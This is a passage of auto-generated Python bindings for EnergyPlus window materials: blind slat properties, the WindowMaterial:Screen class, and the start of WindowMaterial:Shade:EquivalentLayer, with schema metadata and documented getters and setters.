    self["Slat Separation"] = value
@property
def slat_thickness(self):
    """IDD field `Slat Thickness`.

    Distance between the top and bottom surfaces of a slat; the slat is
    assumed to be rectangular in cross section and flat.

    | Units: m (IP units: in)
    | Default value: 0.00025
    | Constraint: value <= 0.1

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Slat Thickness"]

@slat_thickness.setter
def slat_thickness(self, value=0.00025):
    """Write IDD field `Slat Thickness`; invalid values raise ValueError."""
    self["Slat Thickness"] = value
@property
def slat_angle(self):
    """IDD field `Slat Angle`.

    With WindowProperty:ShadingControl slat-angle control type
    FixedSlatAngle this is the fixed slat angle; with BlockBeamSolar it is
    the angle used while slat-angle control is not in effect (e.g. no beam
    solar on the blind); it is unused with ScheduledSlatAngle.

    | Units: deg
    | Default value: 45.0
    | Constraint: value <= 180.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Slat Angle"]

@slat_angle.setter
def slat_angle(self, value=45.0):
    """Write IDD field `Slat Angle`; invalid values raise ValueError."""
    self["Slat Angle"] = value
@property
def slat_conductivity(self):
    """IDD field `Slat Conductivity`.

    The default corresponds to aluminum.

    | Units: W/m-K
    | Default value: 221.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Slat Conductivity"]

@slat_conductivity.setter
def slat_conductivity(self, value=221.0):
    """Write IDD field `Slat Conductivity`; invalid values raise ValueError."""
    self["Slat Conductivity"] = value
@property
def slat_beam_solar_transmittance(self):
    """IDD field `Slat Beam Solar Transmittance`.

    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Slat Beam Solar Transmittance"]

@slat_beam_solar_transmittance.setter
def slat_beam_solar_transmittance(self, value=None):
    """Write IDD field `Slat Beam Solar Transmittance`; invalid values raise ValueError."""
    self["Slat Beam Solar Transmittance"] = value
@property
def front_side_slat_beam_solar_reflectance(self):
    """IDD field `Front Side Slat Beam Solar Reflectance`.

    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Front Side Slat Beam Solar Reflectance"]

@front_side_slat_beam_solar_reflectance.setter
def front_side_slat_beam_solar_reflectance(self, value=None):
    """Write IDD field `Front Side Slat Beam Solar Reflectance`; invalid values raise ValueError."""
    self["Front Side Slat Beam Solar Reflectance"] = value
@property
def back_side_slat_beam_solar_reflectance(self):
    """IDD field `Back Side Slat Beam Solar Reflectance`.

    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Back Side Slat Beam Solar Reflectance"]

@back_side_slat_beam_solar_reflectance.setter
def back_side_slat_beam_solar_reflectance(self, value=None):
    """Write IDD field `Back Side Slat Beam Solar Reflectance`; invalid values raise ValueError."""
    self["Back Side Slat Beam Solar Reflectance"] = value
@property
def slat_diffuse_solar_transmittance(self):
    """IDD field `Slat Diffuse Solar Transmittance`.

    Must equal "Slat beam solar transmittance".

    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Slat Diffuse Solar Transmittance"]

@slat_diffuse_solar_transmittance.setter
def slat_diffuse_solar_transmittance(self, value=None):
    """Write IDD field `Slat Diffuse Solar Transmittance`; invalid values raise ValueError."""
    self["Slat Diffuse Solar Transmittance"] = value
@property
def front_side_slat_diffuse_solar_reflectance(self):
    """IDD field `Front Side Slat Diffuse Solar Reflectance`.

    Must equal "Front Side Slat Beam Solar Reflectance".

    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Front Side Slat Diffuse Solar Reflectance"]

@front_side_slat_diffuse_solar_reflectance.setter
def front_side_slat_diffuse_solar_reflectance(self, value=None):
    """Write IDD field `Front Side Slat Diffuse Solar Reflectance`; invalid values raise ValueError."""
    self["Front Side Slat Diffuse Solar Reflectance"] = value
@property
def back_side_slat_diffuse_solar_reflectance(self):
    """IDD field `Back Side Slat Diffuse Solar Reflectance`.

    Must equal "Back Side Slat Beam Solar Reflectance".

    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Back Side Slat Diffuse Solar Reflectance"]

@back_side_slat_diffuse_solar_reflectance.setter
def back_side_slat_diffuse_solar_reflectance(self, value=None):
    """Write IDD field `Back Side Slat Diffuse Solar Reflectance`; invalid values raise ValueError."""
    self["Back Side Slat Diffuse Solar Reflectance"] = value
@property
def slat_beam_visible_transmittance(self):
    """IDD field `Slat Beam Visible Transmittance`.

    Required for the detailed daylighting calculation.

    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Slat Beam Visible Transmittance"]

@slat_beam_visible_transmittance.setter
def slat_beam_visible_transmittance(self, value=None):
    """Write IDD field `Slat Beam Visible Transmittance`; invalid values raise ValueError."""
    self["Slat Beam Visible Transmittance"] = value
@property
def front_side_slat_beam_visible_reflectance(self):
    """IDD field `Front Side Slat Beam Visible Reflectance`.

    Required for the detailed daylighting calculation.

    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Front Side Slat Beam Visible Reflectance"]

@front_side_slat_beam_visible_reflectance.setter
def front_side_slat_beam_visible_reflectance(self, value=None):
    """Write IDD field `Front Side Slat Beam Visible Reflectance`; invalid values raise ValueError."""
    self["Front Side Slat Beam Visible Reflectance"] = value
@property
def back_side_slat_beam_visible_reflectance(self):
    """IDD field `Back Side Slat Beam Visible Reflectance`.

    Required for the detailed daylighting calculation.

    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Back Side Slat Beam Visible Reflectance"]

@back_side_slat_beam_visible_reflectance.setter
def back_side_slat_beam_visible_reflectance(self, value=None):
    """Write IDD field `Back Side Slat Beam Visible Reflectance`; invalid values raise ValueError."""
    self["Back Side Slat Beam Visible Reflectance"] = value
@property
def slat_diffuse_visible_transmittance(self):
    """IDD field `Slat Diffuse Visible Transmittance`.

    Used only for the detailed daylighting calculation; must equal
    "Slat Beam Visible Transmittance".

    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Slat Diffuse Visible Transmittance"]

@slat_diffuse_visible_transmittance.setter
def slat_diffuse_visible_transmittance(self, value=None):
    """Write IDD field `Slat Diffuse Visible Transmittance`; invalid values raise ValueError."""
    self["Slat Diffuse Visible Transmittance"] = value
@property
def front_side_slat_diffuse_visible_reflectance(self):
    """IDD field `Front Side Slat Diffuse Visible Reflectance`.

    Required for the detailed daylighting calculation; must equal
    "Front Side Slat Beam Visible Reflectance".

    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Front Side Slat Diffuse Visible Reflectance"]

@front_side_slat_diffuse_visible_reflectance.setter
def front_side_slat_diffuse_visible_reflectance(self, value=None):
    """Write IDD field `Front Side Slat Diffuse Visible Reflectance`; invalid values raise ValueError."""
    self["Front Side Slat Diffuse Visible Reflectance"] = value
@property
def back_side_slat_diffuse_visible_reflectance(self):
    """IDD field `Back Side Slat Diffuse Visible Reflectance`.

    Required for the detailed daylighting calculation; must equal
    "Back Side Slat Beam Visible Reflectance".

    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Back Side Slat Diffuse Visible Reflectance"]

@back_side_slat_diffuse_visible_reflectance.setter
def back_side_slat_diffuse_visible_reflectance(self, value=None):
    """Write IDD field `Back Side Slat Diffuse Visible Reflectance`; invalid values raise ValueError."""
    self["Back Side Slat Diffuse Visible Reflectance"] = value
@property
def slat_infrared_hemispherical_transmittance(self):
    """IDD field `Slat Infrared Hemispherical Transmittance`.

    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Slat Infrared Hemispherical Transmittance"]

@slat_infrared_hemispherical_transmittance.setter
def slat_infrared_hemispherical_transmittance(self, value=None):
    """Write IDD field `Slat Infrared Hemispherical Transmittance`; invalid values raise ValueError."""
    self["Slat Infrared Hemispherical Transmittance"] = value
@property
def front_side_slat_infrared_hemispherical_emissivity(self):
    """IDD field `Front Side Slat Infrared Hemispherical Emissivity`.

    | Default value: 0.9
    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Front Side Slat Infrared Hemispherical Emissivity"]

@front_side_slat_infrared_hemispherical_emissivity.setter
def front_side_slat_infrared_hemispherical_emissivity(self, value=0.9):
    """Write IDD field `Front Side Slat Infrared Hemispherical Emissivity`; invalid values raise ValueError."""
    self["Front Side Slat Infrared Hemispherical Emissivity"] = value
@property
def back_side_slat_infrared_hemispherical_emissivity(self):
    """IDD field `Back Side Slat Infrared Hemispherical Emissivity`.

    | Default value: 0.9
    | Constraint: value < 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Back Side Slat Infrared Hemispherical Emissivity"]

@back_side_slat_infrared_hemispherical_emissivity.setter
def back_side_slat_infrared_hemispherical_emissivity(self, value=0.9):
    """Write IDD field `Back Side Slat Infrared Hemispherical Emissivity`; invalid values raise ValueError."""
    self["Back Side Slat Infrared Hemispherical Emissivity"] = value
@property
def blind_to_glass_distance(self):
    """IDD field `Blind to Glass Distance`.

    | Units: m (IP units: in)
    | Default value: 0.05
    | Constraint: 0.01 <= value <= 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Blind to Glass Distance"]

@blind_to_glass_distance.setter
def blind_to_glass_distance(self, value=0.05):
    """Write IDD field `Blind to Glass Distance`; invalid values raise ValueError."""
    self["Blind to Glass Distance"] = value
@property
def blind_top_opening_multiplier(self):
    """IDD field `Blind Top Opening Multiplier`.

    | Default value: 0.5
    | Constraint: value <= 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Blind Top Opening Multiplier"]

@blind_top_opening_multiplier.setter
def blind_top_opening_multiplier(self, value=0.5):
    """Write IDD field `Blind Top Opening Multiplier`; invalid values raise ValueError."""
    self["Blind Top Opening Multiplier"] = value
@property
def blind_bottom_opening_multiplier(self):
    """IDD field `Blind Bottom Opening Multiplier`.

    | Constraint: value <= 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Blind Bottom Opening Multiplier"]

@blind_bottom_opening_multiplier.setter
def blind_bottom_opening_multiplier(self, value=None):
    """Write IDD field `Blind Bottom Opening Multiplier`; invalid values raise ValueError."""
    self["Blind Bottom Opening Multiplier"] = value
@property
def blind_left_side_opening_multiplier(self):
    """IDD field `Blind Left Side Opening Multiplier`.

    | Default value: 0.5
    | Constraint: value <= 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Blind Left Side Opening Multiplier"]

@blind_left_side_opening_multiplier.setter
def blind_left_side_opening_multiplier(self, value=0.5):
    """Write IDD field `Blind Left Side Opening Multiplier`; invalid values raise ValueError."""
    self["Blind Left Side Opening Multiplier"] = value
@property
def blind_right_side_opening_multiplier(self):
    """IDD field `Blind Right Side Opening Multiplier`.

    | Default value: 0.5
    | Constraint: value <= 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Blind Right Side Opening Multiplier"]

@blind_right_side_opening_multiplier.setter
def blind_right_side_opening_multiplier(self, value=0.5):
    """Write IDD field `Blind Right Side Opening Multiplier`; invalid values raise ValueError."""
    self["Blind Right Side Opening Multiplier"] = value
@property
def minimum_slat_angle(self):
    """IDD field `Minimum Slat Angle`.

    Used only when the associated WindowProperty:ShadingControl varies the
    slat angle (slat-angle control type ScheduledSlatAngle or
    BlockBeamSolar).

    | Units: deg
    | Constraint: value <= 180.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Minimum Slat Angle"]

@minimum_slat_angle.setter
def minimum_slat_angle(self, value=None):
    """Write IDD field `Minimum Slat Angle`; invalid values raise ValueError."""
    self["Minimum Slat Angle"] = value
@property
def maximum_slat_angle(self):
    """IDD field `Maximum Slat Angle`.

    Used only when the associated WindowProperty:ShadingControl varies the
    slat angle (slat-angle control type ScheduledSlatAngle or
    BlockBeamSolar).

    | Units: deg
    | Default value: 180.0
    | Constraint: value <= 180.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Maximum Slat Angle"]

@maximum_slat_angle.setter
def maximum_slat_angle(self, value=180.0):
    """Write IDD field `Maximum Slat Angle`; invalid values raise ValueError."""
    self["Maximum Slat Angle"] = value
class WindowMaterialScreen(DataObject):

    """Corresponds to IDD object `WindowMaterial:Screen`.

    Physical properties of a window screen. A screen can only be located
    on the exterior side of a window construction.
    """

    # Field metadata mirrors the EnergyPlus IDD entry for
    # WindowMaterial:Screen; the DataObject base class uses it for
    # validation and ordering of fields.
    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name',
              'pyname': u'name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'alpha'}),
            (u'reflected beam transmittance accounting method',
             {'name': u'Reflected Beam Transmittance Accounting Method',
              'pyname': u'reflected_beam_transmittance_accounting_method',
              'default': u'ModelAsDiffuse',
              'required-field': False,
              'autosizable': False,
              'accepted-values': [u'DoNotModel',
                                  u'ModelAsDirectBeam',
                                  u'ModelAsDiffuse'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'diffuse solar reflectance',
             {'name': u'Diffuse Solar Reflectance',
              'pyname': u'diffuse_solar_reflectance',
              'maximum<': 1.0,
              'required-field': True,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'dimensionless'}),
            (u'diffuse visible reflectance',
             {'name': u'Diffuse Visible Reflectance',
              'pyname': u'diffuse_visible_reflectance',
              'maximum<': 1.0,
              'required-field': True,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'dimensionless'}),
            (u'thermal hemispherical emissivity',
             {'name': u'Thermal Hemispherical Emissivity',
              'pyname': u'thermal_hemispherical_emissivity',
              'default': 0.9,
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'maximum<': 1.0,
              'unit': u'dimensionless'}),
            (u'conductivity',
             {'name': u'Conductivity',
              'pyname': u'conductivity',
              'default': 221.0,
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'W/m-K'}),
            (u'screen material spacing',
             {'name': u'Screen Material Spacing',
              'pyname': u'screen_material_spacing',
              'minimum>': 0.0,
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'm'}),
            (u'screen material diameter',
             {'name': u'Screen Material Diameter',
              'pyname': u'screen_material_diameter',
              'minimum>': 0.0,
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'm'}),
            (u'screen to glass distance',
             {'name': u'Screen to Glass Distance',
              'pyname': u'screen_to_glass_distance',
              'default': 0.025,
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.001,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'm'}),
            (u'top opening multiplier',
             {'name': u'Top Opening Multiplier',
              'pyname': u'top_opening_multiplier',
              'default': 0.0,
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'dimensionless'}),
            (u'bottom opening multiplier',
             {'name': u'Bottom Opening Multiplier',
              'pyname': u'bottom_opening_multiplier',
              'default': 0.0,
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'dimensionless'}),
            (u'left side opening multiplier',
             {'name': u'Left Side Opening Multiplier',
              'pyname': u'left_side_opening_multiplier',
              'default': 0.0,
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'dimensionless'}),
            (u'right side opening multiplier',
             {'name': u'Right Side Opening Multiplier',
              'pyname': u'right_side_opening_multiplier',
              'default': 0.0,
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'dimensionless'}),
            (u'angle of resolution for screen transmittance output map',
             {'name': u'Angle of Resolution for Screen Transmittance Output Map',
              'pyname': u'angle_of_resolution_for_screen_transmittance_output_map',
              'default': 0,
              'required-field': False,
              'autosizable': False,
              'accepted-values': [0,
                                  1,
                                  2,
                                  3,
                                  5],
              'autocalculatable': False,
              'type': 'integer',
              'unit': u'deg'})]),
        'format': None,
        'group': u'Surface Construction Elements',
        'min-fields': 9,
        'name': u'WindowMaterial:Screen',
        'pyname': u'WindowMaterialScreen',
        'required-object': False,
        'unique-object': False}

    @property
    def name(self):
        """IDD field `Name`.

        A unique name for this window screen material.

        Returns:
            str: the stored value, or None if the field is unset.
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Write IDD field `Name`; invalid values raise ValueError."""
        self["Name"] = value

    @property
    def reflected_beam_transmittance_accounting_method(self):
        """IDD field `Reflected Beam Transmittance Accounting Method`.

        How beam solar reflected off the material surface is accounted
        for.

        | Default value: ModelAsDiffuse

        Returns:
            str: the stored value, or None if the field is unset.
        """
        return self["Reflected Beam Transmittance Accounting Method"]

    @reflected_beam_transmittance_accounting_method.setter
    def reflected_beam_transmittance_accounting_method(
            self,
            value="ModelAsDiffuse"):
        """Write IDD field `Reflected Beam Transmittance Accounting Method`;
        invalid values raise ValueError."""
        self["Reflected Beam Transmittance Accounting Method"] = value

    @property
    def diffuse_solar_reflectance(self):
        """IDD field `Diffuse Solar Reflectance`.

        Diffuse reflectance of the screen material over the entire solar
        radiation spectrum; assumed identical for both sides of the
        screen.

        | Units: dimensionless
        | Constraint: value < 1.0

        Returns:
            float: the stored value, or None if the field is unset.
        """
        return self["Diffuse Solar Reflectance"]

    @diffuse_solar_reflectance.setter
    def diffuse_solar_reflectance(self, value=None):
        """Write IDD field `Diffuse Solar Reflectance`; invalid values raise
        ValueError."""
        self["Diffuse Solar Reflectance"] = value

    @property
    def diffuse_visible_reflectance(self):
        """IDD field `Diffuse Visible Reflectance`.

        Diffuse visible reflectance of the screen material averaged over
        the solar spectrum and weighted by the response of the human eye;
        assumed identical for both sides of the screen.

        | Units: dimensionless
        | Constraint: value < 1.0

        Returns:
            float: the stored value, or None if the field is unset.
        """
        return self["Diffuse Visible Reflectance"]

    @diffuse_visible_reflectance.setter
    def diffuse_visible_reflectance(self, value=None):
        """Write IDD field `Diffuse Visible Reflectance`; invalid values raise
        ValueError."""
        self["Diffuse Visible Reflectance"] = value

    @property
    def thermal_hemispherical_emissivity(self):
        """IDD field `Thermal Hemispherical Emissivity`.

        Long-wave emissivity of the screen material; assumed identical for
        both sides of the screen.

        | Units: dimensionless
        | Default value: 0.9
        | Constraint: value < 1.0

        Returns:
            float: the stored value, or None if the field is unset.
        """
        return self["Thermal Hemispherical Emissivity"]

    @thermal_hemispherical_emissivity.setter
    def thermal_hemispherical_emissivity(self, value=0.9):
        """Write IDD field `Thermal Hemispherical Emissivity`; invalid values
        raise ValueError."""
        self["Thermal Hemispherical Emissivity"] = value

    @property
    def conductivity(self):
        """IDD field `Conductivity`.

        Thermal conductivity of the screen material; the default is for
        aluminum.

        | Units: W/m-K
        | Default value: 221.0

        Returns:
            float: the stored value, or None if the field is unset.
        """
        return self["Conductivity"]

    @conductivity.setter
    def conductivity(self, value=221.0):
        """Write IDD field `Conductivity`; invalid values raise ValueError."""
        self["Conductivity"] = value

    @property
    def screen_material_spacing(self):
        """IDD field `Screen Material Spacing`.

        Spacing is assumed to be the same in both directions.

        | Units: m (IP units: in)

        Returns:
            float: the stored value, or None if the field is unset.
        """
        return self["Screen Material Spacing"]

    @screen_material_spacing.setter
    def screen_material_spacing(self, value=None):
        """Write IDD field `Screen Material Spacing`; invalid values raise
        ValueError."""
        self["Screen Material Spacing"] = value

    @property
    def screen_material_diameter(self):
        """IDD field `Screen Material Diameter`.

        Diameter is assumed to be the same in both directions.

        | Units: m (IP units: in)

        Returns:
            float: the stored value, or None if the field is unset.
        """
        return self["Screen Material Diameter"]

    @screen_material_diameter.setter
    def screen_material_diameter(self, value=None):
        """Write IDD field `Screen Material Diameter`; invalid values raise
        ValueError."""
        self["Screen Material Diameter"] = value

    @property
    def screen_to_glass_distance(self):
        """IDD field `Screen to Glass Distance`.

        Distance from the window screen to the adjacent glass surface.

        | Units: m (IP units: in)
        | Default value: 0.025
        | Constraint: 0.001 <= value <= 1.0

        Returns:
            float: the stored value, or None if the field is unset.
        """
        return self["Screen to Glass Distance"]

    @screen_to_glass_distance.setter
    def screen_to_glass_distance(self, value=0.025):
        """Write IDD field `Screen to Glass Distance`; invalid values raise
        ValueError."""
        self["Screen to Glass Distance"] = value

    @property
    def top_opening_multiplier(self):
        """IDD field `Top Opening Multiplier`.

        Effective area for air flow at the top of the screen divided by
        the perpendicular area between the glass and the top of the
        screen.

        | Units: dimensionless
        | Constraint: value <= 1.0

        Returns:
            float: the stored value, or None if the field is unset.
        """
        return self["Top Opening Multiplier"]

    @top_opening_multiplier.setter
    def top_opening_multiplier(self, value=None):
        """Write IDD field `Top Opening Multiplier`; invalid values raise
        ValueError."""
        self["Top Opening Multiplier"] = value

    @property
    def bottom_opening_multiplier(self):
        """IDD field `Bottom Opening Multiplier`.

        Effective area for air flow at the bottom of the screen divided by
        the perpendicular area between the glass and the bottom of the
        screen.

        | Units: dimensionless
        | Constraint: value <= 1.0

        Returns:
            float: the stored value, or None if the field is unset.
        """
        return self["Bottom Opening Multiplier"]

    @bottom_opening_multiplier.setter
    def bottom_opening_multiplier(self, value=None):
        """Write IDD field `Bottom Opening Multiplier`; invalid values raise
        ValueError."""
        self["Bottom Opening Multiplier"] = value

    @property
    def left_side_opening_multiplier(self):
        """IDD field `Left Side Opening Multiplier`.

        Effective area for air flow at the left side of the screen divided
        by the perpendicular area between the glass and the left side of
        the screen.

        | Units: dimensionless
        | Constraint: value <= 1.0

        Returns:
            float: the stored value, or None if the field is unset.
        """
        return self["Left Side Opening Multiplier"]

    @left_side_opening_multiplier.setter
    def left_side_opening_multiplier(self, value=None):
        """Write IDD field `Left Side Opening Multiplier`; invalid values
        raise ValueError."""
        self["Left Side Opening Multiplier"] = value

    @property
    def right_side_opening_multiplier(self):
        """IDD field `Right Side Opening Multiplier`.

        Effective area for air flow at the right side of the screen
        divided by the perpendicular area between the glass and the right
        side of the screen.

        | Units: dimensionless
        | Constraint: value <= 1.0

        Returns:
            float: the stored value, or None if the field is unset.
        """
        return self["Right Side Opening Multiplier"]

    @right_side_opening_multiplier.setter
    def right_side_opening_multiplier(self, value=None):
        """Write IDD field `Right Side Opening Multiplier`; invalid values
        raise ValueError."""
        self["Right Side Opening Multiplier"] = value

    @property
    def angle_of_resolution_for_screen_transmittance_output_map(self):
        """IDD field `Angle of Resolution for Screen Transmittance Output Map`.

        Resolution of azimuth and altitude angles for the screen
        transmittance map. A value of 0 means no transmittance map will be
        generated; valid values are 0, 1, 2, 3 and 5.

        | Units: deg

        Returns:
            int: the stored value, or None if the field is unset.
        """
        return self["Angle of Resolution for Screen Transmittance Output Map"]

    @angle_of_resolution_for_screen_transmittance_output_map.setter
    def angle_of_resolution_for_screen_transmittance_output_map(
            self,
            value=None):
        """Write IDD field `Angle of Resolution for Screen Transmittance
        Output Map`; invalid values raise ValueError."""
        self["Angle of Resolution for Screen Transmittance Output Map"] = value
class WindowMaterialShadeEquivalentLayer(DataObject):

    """ Corresponds to IDD object `WindowMaterial:Shade:EquivalentLayer`
        Specifies the properties of equivalent layer window shade material
        Shades are considered to be perfect diffusers (all transmitted and
        reflected radiation is hemispherically-diffuse) independent of angle
        of incidence. Shade represents roller blinds.
    """
    # IDD schema metadata consumed by the DataObject base class.  Field order
    # mirrors the IDD object definition (order matters for IDF round-tripping,
    # hence OrderedDict).  The keys 'maximum<' / 'minimum>' appear to denote
    # strict (exclusive) bounds -- this matches the "value < 1.0" notes in the
    # property docstrings below; TODO(review): confirm against DataObject's
    # validation logic.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'shade beam-beam solar transmittance',
                                       {'name': u'Shade Beam-Beam Solar Transmittance',
                                        'pyname': u'shade_beambeam_solar_transmittance',
                                        'default': 0.0,
                                        'maximum': 0.8,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'front side shade beam-diffuse solar transmittance',
                                       {'name': u'Front Side Shade Beam-Diffuse Solar Transmittance',
                                        'pyname': u'front_side_shade_beamdiffuse_solar_transmittance',
                                        'maximum<': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'back side shade beam-diffuse solar transmittance',
                                       {'name': u'Back Side Shade Beam-Diffuse Solar Transmittance',
                                        'pyname': u'back_side_shade_beamdiffuse_solar_transmittance',
                                        'maximum<': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'front side shade beam-diffuse solar reflectance',
                                       {'name': u'Front Side Shade Beam-Diffuse Solar Reflectance',
                                        'pyname': u'front_side_shade_beamdiffuse_solar_reflectance',
                                        'maximum<': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'back side shade beam-diffuse solar reflectance',
                                       {'name': u'Back Side Shade Beam-Diffuse Solar Reflectance',
                                        'pyname': u'back_side_shade_beamdiffuse_solar_reflectance',
                                        'maximum<': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'shade beam-beam visible transmittance at normal incidence',
                                       {'name': u'Shade Beam-Beam Visible Transmittance at Normal Incidence',
                                        'pyname': u'shade_beambeam_visible_transmittance_at_normal_incidence',
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'shade beam-diffuse visible transmittance at normal incidence',
                                       {'name': u'Shade Beam-Diffuse Visible Transmittance at Normal Incidence',
                                        'pyname': u'shade_beamdiffuse_visible_transmittance_at_normal_incidence',
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'shade beam-diffuse visible reflectance at normal incidence',
                                       {'name': u'Shade Beam-Diffuse Visible Reflectance at Normal Incidence',
                                        'pyname': u'shade_beamdiffuse_visible_reflectance_at_normal_incidence',
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'shade material infrared transmittance',
                                       {'name': u'Shade Material Infrared Transmittance',
                                        'pyname': u'shade_material_infrared_transmittance',
                                        'default': 0.05,
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'front side shade material infrared emissivity',
                                       {'name': u'Front Side Shade Material Infrared Emissivity',
                                        'pyname': u'front_side_shade_material_infrared_emissivity',
                                        'default': 0.91,
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'maximum<': 1.0,
                                        'unit': u'dimensionless'}),
                                      (u'back side shade material infrared emissivity',
                                       {'name': u'Back Side Shade Material Infrared Emissivity',
                                        'pyname': u'back_side_shade_material_infrared_emissivity',
                                        'default': 0.91,
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'maximum<': 1.0,
                                        'unit': u'dimensionless'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 6,
               'name': u'WindowMaterial:Shade:EquivalentLayer',
               'pyname': u'WindowMaterialShadeEquivalentLayer',
               'required-object': False,
               'unique-object': False}

    # Each field below is exposed as a property pair; both getter and setter
    # delegate to DataObject item access keyed by the field's display name.

    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set

        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def shade_beambeam_solar_transmittance(self):
        """field `Shade Beam-Beam Solar Transmittance`

        |  The beam-beam solar transmittance at normal incidence. This value is
        |  the same as the openness area fraction of the shade material. Assumed
        |  to be the same for front and back sides.
        |  Units: dimensionless
        |  value <= 0.8

        Args:
            value (float): value for IDD Field `Shade Beam-Beam Solar Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `shade_beambeam_solar_transmittance` or None if not set

        """
        return self["Shade Beam-Beam Solar Transmittance"]

    @shade_beambeam_solar_transmittance.setter
    def shade_beambeam_solar_transmittance(self, value=None):
        """ Corresponds to IDD field `Shade Beam-Beam Solar Transmittance`
        """
        self["Shade Beam-Beam Solar Transmittance"] = value

    @property
    def front_side_shade_beamdiffuse_solar_transmittance(self):
